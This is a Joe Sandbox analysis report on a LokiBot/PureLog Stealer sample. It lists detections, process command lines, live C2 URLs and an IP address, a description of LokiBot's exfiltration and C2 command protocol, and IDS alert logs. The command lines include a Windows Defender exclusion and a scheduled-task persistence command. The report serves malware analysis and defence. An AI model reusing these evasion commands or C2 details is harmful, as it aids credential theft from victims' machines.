Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FVR-N2411-07396.exe

Overview

General Information

Sample name:FVR-N2411-07396.exe
Analysis ID:1564533
MD5:2f402635e17b4f0d9c0d6922d384936a
SHA1:2753a159f2cf160733b1ceeede1db57d2dde0375
SHA256:bfd4e29505627b76243c4ea34c07b22af7edc00391b112e78c2dc3cf7a48d742
Tags:exeLokiuser-abuse_ch
Infos:

Detection

Lokibot, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Lokibot
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • FVR-N2411-07396.exe (PID: 2668 cmdline: "C:\Users\user\Desktop\FVR-N2411-07396.exe" MD5: 2F402635E17B4F0D9C0D6922D384936A)
    • powershell.exe (PID: 6420 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 6388 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 1124 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpA6B9.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • FVR-N2411-07396.exe (PID: 1496 cmdline: "C:\Users\user\Desktop\FVR-N2411-07396.exe" MD5: 2F402635E17B4F0D9C0D6922D384936A)
  • ZeJFfrYmOnJKS.exe (PID: 1436 cmdline: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe MD5: 2F402635E17B4F0D9C0D6922D384936A)
    • schtasks.exe (PID: 5516 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpC1C3.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ZeJFfrYmOnJKS.exe (PID: 6400 cmdline: "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe" MD5: 2F402635E17B4F0D9C0D6922D384936A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.41/soja/five/fre.php"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    00000007.00000002.3255881950.0000000000CC8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
      00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
            • 0x308b8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
            Click to see the 43 entries
            SourceRuleDescriptionAuthorStrings
            0.2.FVR-N2411-07396.exe.2a7de7c.2.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.FVR-N2411-07396.exe.5540000.6.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.FVR-N2411-07396.exe.5540000.6.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  12.2.ZeJFfrYmOnJKS.exe.400000.0.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                    12.2.ZeJFfrYmOnJKS.exe.400000.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
                      Click to see the 45 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\FVR-N2411-07396.exe", ParentImage: C:\Users\user\Desktop\FVR-N2411-07396.exe, ParentProcessId: 2668, ParentProcessName: FVR-N2411-07396.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe", ProcessId: 6420, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\FVR-N2411-07396.exe", ParentImage: C:\Users\user\Desktop\FVR-N2411-07396.exe, ParentProcessId: 2668, ParentProcessName: FVR-N2411-07396.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe", ProcessId: 6420, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpC1C3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpC1C3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe, ParentImage: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe, ParentProcessId: 1436, ParentProcessName: ZeJFfrYmOnJKS.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpC1C3.tmp", ProcessId: 5516, ProcessName: schtasks.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpA6B9.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpA6B9.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\FVR-N2411-07396.exe", ParentImage: C:\Users\user\Desktop\FVR-N2411-07396.exe, ParentProcessId: 2668, ParentProcessName: FVR-N2411-07396.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpA6B9.tmp", ProcessId: 1124, ProcessName: schtasks.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\FVR-N2411-07396.exe", ParentImage: C:\Users\user\Desktop\FVR-N2411-07396.exe, ParentProcessId: 2668, ParentProcessName: FVR-N2411-07396.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe", ProcessId: 6420, ProcessName: powershell.exe

                      Persistence and Installation Behavior

                      barindex
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpA6B9.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpA6B9.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\FVR-N2411-07396.exe", ParentImage: C:\Users\user\Desktop\FVR-N2411-07396.exe, ParentProcessId: 2668, ParentProcessName: FVR-N2411-07396.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpA6B9.tmp", ProcessId: 1124, ProcessName: schtasks.exe
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-28T13:52:05.944288+010020243121A Network Trojan was detected192.168.2.54970894.156.177.4180TCP
                      2024-11-28T13:52:07.903841+010020243121A Network Trojan was detected192.168.2.54970994.156.177.4180TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-28T13:52:04.479690+010020253811Malware Command and Control Activity Detected192.168.2.54970894.156.177.4180TCP
                      2024-11-28T13:52:06.410511+010020253811Malware Command and Control Activity Detected192.168.2.54970994.156.177.4180TCP
                      2024-11-28T13:52:08.237689+010020253811Malware Command and Control Activity Detected192.168.2.54971194.156.177.4180TCP
                      2024-11-28T13:52:10.072483+010020253811Malware Command and Control Activity Detected192.168.2.54971294.156.177.4180TCP
                      2024-11-28T13:52:11.973667+010020253811Malware Command and Control Activity Detected192.168.2.54971394.156.177.4180TCP
                      2024-11-28T13:52:13.689499+010020253811Malware Command and Control Activity Detected192.168.2.54971494.156.177.4180TCP
                      2024-11-28T13:52:15.393770+010020253811Malware Command and Control Activity Detected192.168.2.54971594.156.177.4180TCP
                      2024-11-28T13:52:17.219155+010020253811Malware Command and Control Activity Detected192.168.2.54971894.156.177.4180TCP
                      2024-11-28T13:52:19.113785+010020253811Malware Command and Control Activity Detected192.168.2.54972194.156.177.4180TCP
                      2024-11-28T13:52:20.813749+010020253811Malware Command and Control Activity Detected192.168.2.54972494.156.177.4180TCP
                      2024-11-28T13:52:22.659042+010020253811Malware Command and Control Activity Detected192.168.2.54972694.156.177.4180TCP
                      2024-11-28T13:52:24.549789+010020253811Malware Command and Control Activity Detected192.168.2.54972794.156.177.4180TCP
                      2024-11-28T13:52:26.365633+010020253811Malware Command and Control Activity Detected192.168.2.54973394.156.177.4180TCP
                      2024-11-28T13:52:28.268944+010020253811Malware Command and Control Activity Detected192.168.2.54973994.156.177.4180TCP
                      2024-11-28T13:52:29.992184+010020253811Malware Command and Control Activity Detected192.168.2.54974594.156.177.4180TCP
                      2024-11-28T13:52:31.691657+010020253811Malware Command and Control Activity Detected192.168.2.54975094.156.177.4180TCP
                      2024-11-28T13:52:33.568487+010020253811Malware Command and Control Activity Detected192.168.2.54975194.156.177.4180TCP
                      2024-11-28T13:52:35.425401+010020253811Malware Command and Control Activity Detected192.168.2.54975794.156.177.4180TCP
                      2024-11-28T13:52:37.177766+010020253811Malware Command and Control Activity Detected192.168.2.54976294.156.177.4180TCP
                      2024-11-28T13:52:38.836045+010020253811Malware Command and Control Activity Detected192.168.2.54976894.156.177.4180TCP
                      2024-11-28T13:52:40.534388+010020253811Malware Command and Control Activity Detected192.168.2.54977194.156.177.4180TCP
                      2024-11-28T13:52:42.351772+010020253811Malware Command and Control Activity Detected192.168.2.54977594.156.177.4180TCP
                      2024-11-28T13:52:44.168555+010020253811Malware Command and Control Activity Detected192.168.2.54978194.156.177.4180TCP
                      2024-11-28T13:52:46.067495+010020253811Malware Command and Control Activity Detected192.168.2.54978594.156.177.4180TCP
                      2024-11-28T13:52:48.007586+010020253811Malware Command and Control Activity Detected192.168.2.54979194.156.177.4180TCP
                      2024-11-28T13:52:49.915881+010020253811Malware Command and Control Activity Detected192.168.2.54979794.156.177.4180TCP
                      2024-11-28T13:52:51.665645+010020253811Malware Command and Control Activity Detected192.168.2.54980194.156.177.4180TCP
                      2024-11-28T13:52:53.728329+010020253811Malware Command and Control Activity Detected192.168.2.54980694.156.177.4180TCP
                      2024-11-28T13:52:55.529063+010020253811Malware Command and Control Activity Detected192.168.2.54981194.156.177.4180TCP
                      2024-11-28T13:52:58.217591+010020253811Malware Command and Control Activity Detected192.168.2.54981894.156.177.4180TCP
                      2024-11-28T13:53:00.334231+010020253811Malware Command and Control Activity Detected192.168.2.54982494.156.177.4180TCP
                      2024-11-28T13:53:02.019879+010020253811Malware Command and Control Activity Detected192.168.2.54982994.156.177.4180TCP
                      2024-11-28T13:53:03.878356+010020253811Malware Command and Control Activity Detected192.168.2.54983394.156.177.4180TCP
                      2024-11-28T13:53:05.737923+010020253811Malware Command and Control Activity Detected192.168.2.54983794.156.177.4180TCP
                      2024-11-28T13:53:07.602577+010020253811Malware Command and Control Activity Detected192.168.2.54984094.156.177.4180TCP
                      2024-11-28T13:53:09.650403+010020253811Malware Command and Control Activity Detected192.168.2.54984594.156.177.4180TCP
                      2024-11-28T13:53:11.943752+010020253811Malware Command and Control Activity Detected192.168.2.54985194.156.177.4180TCP
                      2024-11-28T13:53:13.787378+010020253811Malware Command and Control Activity Detected192.168.2.54985794.156.177.4180TCP
                      2024-11-28T13:53:15.696851+010020253811Malware Command and Control Activity Detected192.168.2.54986294.156.177.4180TCP
                      2024-11-28T13:53:17.383644+010020253811Malware Command and Control Activity Detected192.168.2.54986794.156.177.4180TCP
                      2024-11-28T13:53:19.396128+010020253811Malware Command and Control Activity Detected192.168.2.54987194.156.177.4180TCP
                      2024-11-28T13:53:21.301001+010020253811Malware Command and Control Activity Detected192.168.2.54987794.156.177.4180TCP
                      2024-11-28T13:53:23.160248+010020253811Malware Command and Control Activity Detected192.168.2.54988294.156.177.4180TCP
                      2024-11-28T13:53:24.944914+010020253811Malware Command and Control Activity Detected192.168.2.54988894.156.177.4180TCP
                      2024-11-28T13:53:26.713138+010020253811Malware Command and Control Activity Detected192.168.2.54989394.156.177.4180TCP
                      2024-11-28T13:53:28.528184+010020253811Malware Command and Control Activity Detected192.168.2.54989794.156.177.4180TCP
                      2024-11-28T13:53:30.675910+010020253811Malware Command and Control Activity Detected192.168.2.54990294.156.177.4180TCP
                      2024-11-28T13:53:32.490598+010020253811Malware Command and Control Activity Detected192.168.2.54990894.156.177.4180TCP
                      2024-11-28T13:53:34.319262+010020253811Malware Command and Control Activity Detected192.168.2.54991394.156.177.4180TCP
                      2024-11-28T13:53:36.174269+010020253811Malware Command and Control Activity Detected192.168.2.54991794.156.177.4180TCP
                      2024-11-28T13:53:38.049671+010020253811Malware Command and Control Activity Detected192.168.2.54992394.156.177.4180TCP
                      2024-11-28T13:53:39.893533+010020253811Malware Command and Control Activity Detected192.168.2.54992894.156.177.4180TCP
                      2024-11-28T13:53:42.038877+010020253811Malware Command and Control Activity Detected192.168.2.54993194.156.177.4180TCP
                      2024-11-28T13:53:43.814508+010020253811Malware Command and Control Activity Detected192.168.2.54993694.156.177.4180TCP
                      2024-11-28T13:53:45.677207+010020253811Malware Command and Control Activity Detected192.168.2.54994294.156.177.4180TCP
                      2024-11-28T13:53:47.609817+010020253811Malware Command and Control Activity Detected192.168.2.54994894.156.177.4180TCP
                      2024-11-28T13:53:49.229391+010020253811Malware Command and Control Activity Detected192.168.2.54995194.156.177.4180TCP
                      2024-11-28T13:53:51.134807+010020253811Malware Command and Control Activity Detected192.168.2.54995494.156.177.4180TCP
                      2024-11-28T13:53:52.989363+010020253811Malware Command and Control Activity Detected192.168.2.54995994.156.177.4180TCP
                      2024-11-28T13:53:54.895598+010020253811Malware Command and Control Activity Detected192.168.2.54996594.156.177.4180TCP
                      2024-11-28T13:53:56.768164+010020253811Malware Command and Control Activity Detected192.168.2.54997094.156.177.4180TCP
                      2024-11-28T13:53:58.476192+010020253811Malware Command and Control Activity Detected192.168.2.54997594.156.177.4180TCP
                      2024-11-28T13:54:00.536337+010020253811Malware Command and Control Activity Detected192.168.2.54997994.156.177.4180TCP
                      2024-11-28T13:54:02.191446+010020253811Malware Command and Control Activity Detected192.168.2.54998494.156.177.4180TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-28T13:51:55.400275+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549824TCP
                      2024-11-28T13:52:09.634906+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549711TCP
                      2024-11-28T13:52:11.714786+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549712TCP
                      2024-11-28T13:52:13.412589+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549713TCP
                      2024-11-28T13:52:15.135212+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549714TCP
                      2024-11-28T13:52:16.939118+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549715TCP
                      2024-11-28T13:52:18.855201+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549718TCP
                      2024-11-28T13:52:20.553024+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549721TCP
                      2024-11-28T13:52:22.400000+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549724TCP
                      2024-11-28T13:52:24.292204+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549726TCP
                      2024-11-28T13:52:26.096508+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549727TCP
                      2024-11-28T13:52:27.994452+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549733TCP
                      2024-11-28T13:52:29.713774+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549739TCP
                      2024-11-28T13:52:31.448629+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549745TCP
                      2024-11-28T13:52:33.133068+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549750TCP
                      2024-11-28T13:52:35.152257+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549751TCP
                      2024-11-28T13:52:36.915264+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549757TCP
                      2024-11-28T13:52:38.578089+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549762TCP
                      2024-11-28T13:52:40.274183+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549768TCP
                      2024-11-28T13:52:42.077928+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549771TCP
                      2024-11-28T13:52:43.903449+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549775TCP
                      2024-11-28T13:52:45.798995+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549781TCP
                      2024-11-28T13:52:47.611903+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549785TCP
                      2024-11-28T13:52:49.639320+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549791TCP
                      2024-11-28T13:52:51.399558+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549797TCP
                      2024-11-28T13:52:53.296816+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549801TCP
                      2024-11-28T13:52:55.240089+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549806TCP
                      2024-11-28T13:52:57.940552+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549811TCP
                      2024-11-28T13:52:59.760272+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549818TCP
                      2024-11-28T13:53:03.610341+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549829TCP
                      2024-11-28T13:53:05.477095+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549833TCP
                      2024-11-28T13:53:07.328140+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549837TCP
                      2024-11-28T13:53:09.234121+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549840TCP
                      2024-11-28T13:53:11.676387+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549845TCP
                      2024-11-28T13:53:13.531949+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549851TCP
                      2024-11-28T13:53:15.423126+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549857TCP
                      2024-11-28T13:53:17.088676+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549862TCP
                      2024-11-28T13:53:18.978807+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549867TCP
                      2024-11-28T13:53:21.030551+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549871TCP
                      2024-11-28T13:53:22.903350+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549877TCP
                      2024-11-28T13:53:24.624213+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549882TCP
                      2024-11-28T13:53:26.440822+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549888TCP
                      2024-11-28T13:53:28.260281+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549893TCP
                      2024-11-28T13:53:30.188659+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549897TCP
                      2024-11-28T13:53:32.227331+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549902TCP
                      2024-11-28T13:53:34.031647+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549908TCP
                      2024-11-28T13:53:35.912159+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549913TCP
                      2024-11-28T13:53:37.791691+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549917TCP
                      2024-11-28T13:53:39.637803+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549923TCP
                      2024-11-28T13:53:41.452206+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549928TCP
                      2024-11-28T13:53:43.586239+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549931TCP
                      2024-11-28T13:53:45.416486+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549936TCP
                      2024-11-28T13:53:47.269321+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549942TCP
